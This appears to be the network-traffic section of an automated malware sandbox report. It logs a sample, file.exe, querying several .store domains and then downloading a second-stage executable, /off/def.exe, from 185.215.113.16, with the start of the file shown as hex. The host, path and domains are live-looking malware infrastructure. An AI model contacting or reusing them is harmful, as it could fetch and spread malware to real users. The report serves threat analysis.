                                                                            Oct 31, 2024 20:49:56.490009069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.490060091 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.490206003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.490219116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.490230083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.490338087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.490569115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.490650892 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.490657091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.535876989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.563848019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.563918114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.563930035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.563972950 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.564224005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.564259052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.564296961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.607871056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.607933998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.607940912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.607947111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.608000994 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.608674049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.608767033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.608778000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.608802080 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.608957052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.609004021 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.609113932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.609124899 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.609174013 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.609321117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.609329939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.609369993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.609505892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.609515905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.609571934 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.682723045 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.682794094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.682802916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.682851076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.682881117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.683069944 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.726658106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.726684093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.726696968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.726769924 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.726953030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.726968050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.727021933 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.727417946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.727497101 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.727545977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.727564096 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.727613926 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.727659941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.727751017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.727806091 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.727957964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.728018045 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.728080034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.728146076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.728162050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.728197098 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.801615953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.801708937 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.801724911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.801755905 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.845434904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.845529079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.845541954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.845554113 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.845585108 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.845808029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.845819950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.845860004 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.846590996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.846697092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.846709013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.846755028 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.846981049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.847045898 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.847165108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.847177029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.847188950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.847199917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.847239017 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.847239017 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.920351028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.920428991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.920439959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.920470953 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.964396954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.964413881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.964428902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.964431047 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.964489937 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.964613914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.964626074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.964732885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.964863062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.965342999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.965382099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.965426922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.965593100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.965605021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.965642929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.965857983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.965940952 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.965984106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.966146946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.966159105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.966170073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:56.966207981 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:56.966207981 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.039093971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.039143085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.039155006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.039294004 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.083281040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.083372116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.083384991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.083389044 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.083429098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.083441019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.083441019 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.083564997 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.083663940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084048033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084119081 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.084167957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084180117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084220886 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.084342957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084362030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084414005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.084597111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084682941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084775925 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.084815025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084825993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084836006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.084872007 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.130762100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.159307957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.159425974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.159435987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.159492016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.201694012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.201720953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.201857090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.201899052 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.201899052 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.202183962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.202302933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.202313900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203032970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203094959 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.203094959 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.203171968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203182936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203257084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.203475952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203486919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203499079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203602076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.203870058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.203881979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.204161882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.204174042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.204199076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.204199076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.255755901 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.278044939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.278137922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.278150082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.278471947 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.320512056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.320616007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.320632935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.320818901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.320847988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.320877075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.320888042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.320913076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.320923090 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.321482897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.321521997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.321532011 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.321592093 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.321649075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.321669102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.321697950 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.321898937 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.322041035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.322065115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.322089911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.322101116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.322185040 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.322252035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.322309971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.322365046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.322376013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.322438955 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.397058964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.397102118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.397114992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.397351027 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.439300060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.439352036 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.439390898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.439404964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.439445019 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.439578056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.439748049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.439760923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.439788103 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.440231085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440289021 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.440340996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440352917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440397978 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.440579891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440712929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440763950 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.440834045 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440871954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440885067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440895081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.440911055 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.440933943 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.441207886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.441234112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.441245079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.441279888 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.441598892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.441601038 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:57.441678047 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:57.646550894 CET4974980192.168.2.6185.215.113.16
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 31, 2024 20:48:57.720336914 CET6313153192.168.2.61.1.1.1
                                                                            Oct 31, 2024 20:48:57.729552984 CET53631311.1.1.1192.168.2.6
                                                                            Oct 31, 2024 20:48:57.734268904 CET5098753192.168.2.61.1.1.1
                                                                            Oct 31, 2024 20:48:57.743174076 CET53509871.1.1.1192.168.2.6
                                                                            Oct 31, 2024 20:48:57.748624086 CET6146753192.168.2.61.1.1.1
                                                                            Oct 31, 2024 20:48:57.758076906 CET53614671.1.1.1192.168.2.6
                                                                            Oct 31, 2024 20:48:57.759259939 CET5386253192.168.2.61.1.1.1
                                                                            Oct 31, 2024 20:48:57.768208981 CET53538621.1.1.1192.168.2.6
                                                                            Oct 31, 2024 20:48:57.770802975 CET5274353192.168.2.61.1.1.1
                                                                            Oct 31, 2024 20:48:57.794821978 CET53527431.1.1.1192.168.2.6
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 31, 2024 20:48:57.720336914 CET192.168.2.61.1.1.10x99dfStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.734268904 CET192.168.2.61.1.1.10x7d98Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.748624086 CET192.168.2.61.1.1.10x3471Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.759259939 CET192.168.2.61.1.1.10x6a9cStandard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.770802975 CET192.168.2.61.1.1.10x27e0Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 31, 2024 20:48:57.729552984 CET1.1.1.1192.168.2.60x99dfName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.743174076 CET1.1.1.1192.168.2.60x7d98Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.758076906 CET1.1.1.1192.168.2.60x3471Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.768208981 CET1.1.1.1192.168.2.60x6a9cName error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.794821978 CET1.1.1.1192.168.2.60x27e0No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 31, 2024 20:48:57.794821978 CET1.1.1.1192.168.2.60x27e0No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                            • necklacedmny.store
                                                                            • 185.215.113.16
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.649749185.215.113.16802136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 31, 2024 20:49:11.049612045 CET200OUTGET /off/def.exe HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Host: 185.215.113.16
                                                                            Oct 31, 2024 20:49:11.988677025 CET1236INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Thu, 31 Oct 2024 19:49:11 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 2822144
                                                                            Last-Modified: Thu, 31 Oct 2024 19:14:55 GMT
                                                                            Connection: keep-alive
                                                                            ETag: "6723d72f-2b1000"
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 80 36 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ +6+`Ui` @ @.rsrc`2@.idata 8@gwksigml**:@xtwnmccs `+*@.taggant@+"*@
                                                                            Oct 31, 2024 20:49:11.988698006 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 31, 2024 20:49:11.988708973 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 31, 2024 20:49:11.988944054 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 31, 2024 20:49:11.988955021 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 31, 2024 20:49:11.988965988 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Oct 31, 2024 20:49:11.988976955 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
